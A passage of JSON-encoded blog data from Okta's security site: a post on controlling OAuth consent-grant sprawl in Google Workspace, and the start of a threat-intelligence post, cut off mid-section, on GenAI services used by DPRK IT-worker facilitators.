Her primary objective at Okta is to empower customers in maintaining robust security postures by offering expert assistance during critical incidents and providing strategic advice on implementing security practices to prevent future crises.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5I9s1hF8KWpGBmULB45xsz/0c88ef2e82d499d9b21fe261bdc645d0/Maria_Vasilevskaya_1753479368125001xuTE.png"},"name":"Maria Vasilevskaya","jobTitle":"Principal Security Engineer","slug":"/hackers/maria-vasilevskaya","node_locale":"en"}]},{"slug":"/controllingoauthsprawl","id":"71595802-b687-5c5b-a6a9-63d2bf663cd9","title":"Controlling Cross-App Data Sprawl in Google Workspace","date":"2025-07-31T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most difficult challenges in third party risk management (TPRM) is how to effectively manage application sprawl. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s possible, but painful to allowlist apps at the operating system level using execution control tools. It’s possible, but painful to allowlist browser extensions using managed or isolated browsers. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s also painful to manage the ability of users to authorise third party applications to access data in sanctioned SaaS platforms, such as Microsoft 365 or Google Workspace. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For many years, the default configuration in productivity platforms was to allow users to provide their consent to allow third party apps to access data in their account using OAuth consent grants.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This was empowering for individual (consumer) users, and facilitated strong growth in these platform ecosystems. It wasn’t so rosy for the enterprise, however, which now had to contend with users sharing unbridled access to corporate-owned resources. The risks were exacerbated because the tools to manage OAuth content grants were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter22/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"gated by premium licenses\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"OAuth Consent Phishing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a result, legitimate OAuth apps have become a prime target for attackers and rogue OAuth apps have become a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"useful tool for phishing enterprise users\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In an OAuth Consent Phishing attack, social engineers create a pretext that convinces users to allow a third-party application to access data in their account. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Public examples of these  attacks have impersonated trusted entities such as:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter15/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Email filtering software\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. “Please update your email security extension”)  \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.sekoia.io/targeted-supply-chain-attack-against-chrome-browser-extensions/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google Developer Support\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. “Your item is at risk of being removed from the Chrome web store. 
Please accept our policies to continue publishing your products”) \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bleepingcomputer.com/news/security/sans-shares-details-on-attack-that-led-to-their-data-breach/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"internal HR team\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (e.g. a shared file with the words “July bonus” in the filename)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can’t blame the user for these attacks.  In these examples, developers of browser extensions and even security experts at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://risky.biz/newsletter22/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SANS Institute\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (yes, the guys that train cybersecurity professionals) were duped into allowing rogue apps to raid their inboxes, wikis and calendars. This is an attack that can trick just about anybody.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The risk is exacerbated in environments where an administrative user performs their administrative tasks and their general productivity work using the same account: one erroneous consent and they can easily give away the keys to the kingdom. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Tackling unsanctioned apps at Okta\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A few months ago, concerns over OAuth consent grants resurfaced after Patrick Opet, Chief Information Security Officer at JP Morgan, wrote an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.jpmorgan.com/technology/technology-blog/open-letter-to-our-suppliers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"open letter to third-party suppliers\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" expressing his anxiety about the erosion of traditional enterprise boundaries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"His primary concern was integration patterns that enable users to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"create direct, often unchecked interactions between third-party services and firms’ sensitive internal resources.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve had to tackle this internally at Okta. Our team has blocked thousands of attempts by corporate users to provide consent to OAuth applications to access data in their Google Workspace accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vast majority of these requests were for app scripts developed by Okta staff who wanted to extend the functionality of Google Sheets or Google Calendar.  Okta is an organization that prides itself on employees being “builders and owners” with the technical skills to automate their way out of problems. 
So the key to a good security program is to find safe ways for them to experiment. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security tackled this problem internally by:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"configuring our Workspace environment to deny user consent to add new applications by default, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"making it as easy as possible for legitimate apps to be allowlisted, and \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"assigning ownership and monitoring activity in allowlisted applications.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a user attempts to consent to an unsanctioned application, the request is denied (see image below). The user is presented with instructions on how to file a ticket to have the application reviewed by Okta’s Third Party Risk Management (TPRM) team. The process requires the user to provide a business justification for adding the application. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"yTvcSJHL7FShGEegrNbzQ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The TPRM team assesses the business case, whether the application was developed by an approved vendor, and if so, whether the scope of the integration is appropriate for the use case. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Often applications are only allowlisted after the scope of the integration is appropriately minimized, and a service account is configured to manage the integration.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you need to tackle a backlog of integrated apps, Google Workspace includes \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.google.com/a/answer/7281227?sjid=15614519911387360251-NC\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"administrative tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that allow administrators to filter app integrations according to whether they are verified, which users or groups can access them and the allowed scopes for the app. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The world needs cross-app access!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security was only able to manage what data stored in Google Workspace could be shared with other third party apps because Google built the required administrative controls and Okta was licensed to use them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What about all the other apps? The average enterprise has 247 apps integrated in Okta, according to Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Businesses at Work\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" report. It’s naive to expect that all of those SaaS companies have the capability and resources to develop bespoke management capabilities to the degree Google can, or that enterprise CSOs have the resources to configure cross-app sharing in 200+ different consoles!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So ultimately, if we want to solve the problem of cross-app data sharing a scale, we believe these cross-application authorization flows need to be managed centrally by the CISO, using a centralized Identity solution, rather than within each individual application. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With this in mind, Okta recently proposed \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/integrations/cross-app-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cross-App Access\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", a method of securing agent-to-app and app-to-app access. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To learn more about securing app-to-app access, you can \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/identity-summit/securing-agentic-ai/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"register\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to join our upcoming seminar.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"The world needs a better way to manage app-to-app access."},"updatedAt":"2025-07-31T12:37:20.996Z","secAuthor":[{"id":"fc46d989-8232-5b6d-b14b-0773571a4d5c","bio":{"bio":"<p>Lana Grechko is a Director of Business Technology Security at Okta. Lana leads a high-impact team focused on securing corporate infrastructure and driving key security initiatives across Identity and Access Management (IAM), Infrastructure Security, and Federal Compliance. Partnering closely with engineering, security, and BT teams, she designs and implements strategies that align security with business goals. Prior to Okta, Lana led the design and implementation of the KYC and AML Programs at Bank of West/BNP Paribas. Outside of work, she is San Francisco-based and enjoys playing tennis, pickleball, and reading. 
</p>"},"image":null,"name":"Lana Grechko","jobTitle":"Director of Business Technology, Security","slug":"hackers/lana-grechko","node_locale":"en"},{"id":"c3f1a2c5-fd9d-5675-9915-c3574309e91c","bio":{"bio":"<p> Mike Hennessey is an Enterprise Security Architect at Okta. He is a passionate advocate for modern cybersecurity paradigms and specializes in building resilient and intelligent security frameworks that go beyond traditional perimeters and focuses on enabling secure access and protecting critical data in today's dynamic threat landscape. Mike has spearheaded multiple initiatives in Zero Trust network architecture, refining identity access management, implementing contextual access controls, and fortifying data protection strategies. His expertise lies in translating complex security challenges into practical, scalable solutions. When not dissecting network packets or architecting secure systems, Mike is navigating the joyful chaos of being a father to three energetic kids, often finding real-world parallels to the importance of strong boundaries and adaptive strategies.</p>"},"image":null,"name":"Mike Hennessey","jobTitle":"Enterprise Security Architect","slug":"/hackers-mike-hennessey","node_locale":"en"},{"id":"28ee0ce3-3827-537f-adee-23f41419d16e","bio":{"bio":"<p> Mat Clinton is a Senior Engineering Manager at Okta. He has a background in software development working on internal tools, infrastructure, and security focussed automation at some of the most well-known companies in the industry. Mat and his team’s contributions at Okta push forward the company’s OSIC goals, in pursuit of being the most secure company in the world, while also balancing the needs of productivity enablement for our internal teams. Mat’s recent focus has been related to safe AI usage at Okta through his work on the internal AI Governance board where they evaluate a constant stream of new AI features being released by SAAS providers. 
Outside of work, Mat likes to spend time at the beach surfing, playing golf with friends, and automating things around the house. </p>"},"image":null,"name":"Mat Clinton","jobTitle":"Senior Engineering Manager","slug":"/hackers/mat-clinton","node_locale":"en"}]},{"slug":"/articles/2025/04/GenAIDPRK","id":"9230aba7-8ff9-5067-a3c1-e84dd0113f50","title":"How AI services power the DPRK’s IT contracting scams ","date":"2025-04-24T22:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta Threat Intelligence conducted in-depth research into online services used by individuals identified by US authorities and trusted third parties as agents for the Democratic People’s Republic of Korea (DPRK).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our research finds that generative artificial intelligence (GenAI) is playing an integral role in how North Korean nationals gain employment in remote technical roles around the globe, in what some researchers refer to  as “DPRK IT Workers” or “Wagemole” campaigns.  \\n\\nGenAI is used to create compelling personas at numerous stages of the job application and interview process. 
Once employed, GenAI tools are also used to assist in maintaining multiple simultaneous roles to earn revenue for the state.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has observed multiple AI-enhanced services used to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Manage the communications of multiple personas and their numerous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Translate, transcribe and summarize communications\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Generate and critique CVs and cover letters \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conduct mock job interviews via chat and webcam\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Test and improve the likelihood of any given job application passing automated checks\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has also observed facilitator use of online shipping and logistics services. 
We hypothesise that these services are used to redirect company-issued devices to “laptop farms” operated by facilitators based in Western countries.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Background\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multiple \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/archives/opa/pr/fourteen-north-korean-nationals-indicted-carrying-out-multi-year-fraudulent-information\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"arrests and indictments\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" have revealed the scale at which individuals operating on behalf of the DPRK have been mobilized into neighbouring countries to gain fraudulent employment in organizations across the globe.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The primary objective of these schemes is to raise funds for the DPRK and compensate for the significant financial sanctions applied to the North Korean regime. US agencies have also identified several outlier cases in which the access to systems provided for employment was used to facilitate espionage or data extortion.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targets for these fraudulent schemes appear opportunistic and based on the availability of remote technical roles. The employers most at-risk are technology companies that are more likely to accept remote candidates for IT or software engineering roles, often on a contingent basis. However, these campaigns also extend to industry verticals well beyond the technology sector. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has worked with highly targeted customers and partners, with a view to developing preventative controls for this unique threat model. In the process, Okta has revised our own onboarding processes, shared awareness collateral and built out numerous methods of detection. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The research had a direct influence on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/idp-idv.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"feature enhancements\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" built into Okta Workforce Identity, such as ID verification services, that Okta customers can use to reduce their exposure to this threat. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Facilitators\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our understanding of this threat is shaped by the unique insight Okta Threat Intelligence can glean into the tools used by those individuals identified as “facilitators” of fraudulent employment schemes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These facilitators provide the necessary in-country support, technical infrastructure and/or legitimate business cover to help individuals from sanctioned countries gain and maintain employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators already apprehended by law enforcement in the United States are alleged to have knowingly provided a range of support services to DPRK nationals:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Direct assistance in the recruitment process\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A domestic address for the shipment of company-issued devices\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Access to legitimate identity documents\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Operating company-issued devices on the remote worker’s 
behalf\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Installing remote management and monitoring (RMM) tools on the device to facilitate the remote work\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticating, where necessary, on the remote worker’s behalf\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One Arizona-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"“laptop farm” operation\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" exposed in May 2024 is alleged to have assisted in the placement of over 300 individuals in technical positions across the United States. 
In another \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.justice.gov/opa/pr/two-north-korean-nationals-and-three-facilitators-indicted-multi-year-fraudulent-remote\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"January 2025 indictment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", two US residents were accused of fraudulently obtaining employment and operating a laptop farm in North Carolina for DPRK nationals, after they’d successfully gained employment at 64 organizations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta can now reveal for the first time the degree to which facilitators of fraudulent work schemes rely on emerging GenAI-enhanced services to scale their operations. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta customers can read a comprehensive report into DPRK IT Worker fraud at the Okta Security Trust Center.\\nPrimary Security Contacts can sign-in to access threat advisories at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-enhanced tools\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In recent months, individuals strongly suspected to be DPRK-created personas 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.vidocsecurity.com/blog/deepfake-fraud-2/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"have been recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" using real-time “deepfake” video during interviews.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence research has observed a far broader set of GenAI services used in these schemes, suggesting a very deliberate attempt by facilitators to keep pace with AI innovation. Facilitators are now using GenAI-based tools to optimize every step in the process of applying and interviewing for roles and to aid DPRK nationals attempting to maintain this employment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Facilitators were observed using GenAI-based services specializing in:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Unified messaging\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recruitment platforms\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Resume/CV screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Candidate 
management\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Automated job screening\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI-based chatbots\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"AI code training\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Online shipping\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Threat Intelligence is not able to observe the facilitators’ activities beyond the login page, the narrow range of functionality offered by many of these tools allows us to hypothesize on some likely use cases:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Unified messaging\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the most demanding challenges for facilitators is how to manage multi-channel communications on behalf of dozens of candidates from sanctioned countries and their multiple personas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence observed the use of unified messaging services to manage many simultaneous mobile phone accounts, instant messaging accounts, email accounts and other related chat services behind a “single pane of glass”. 
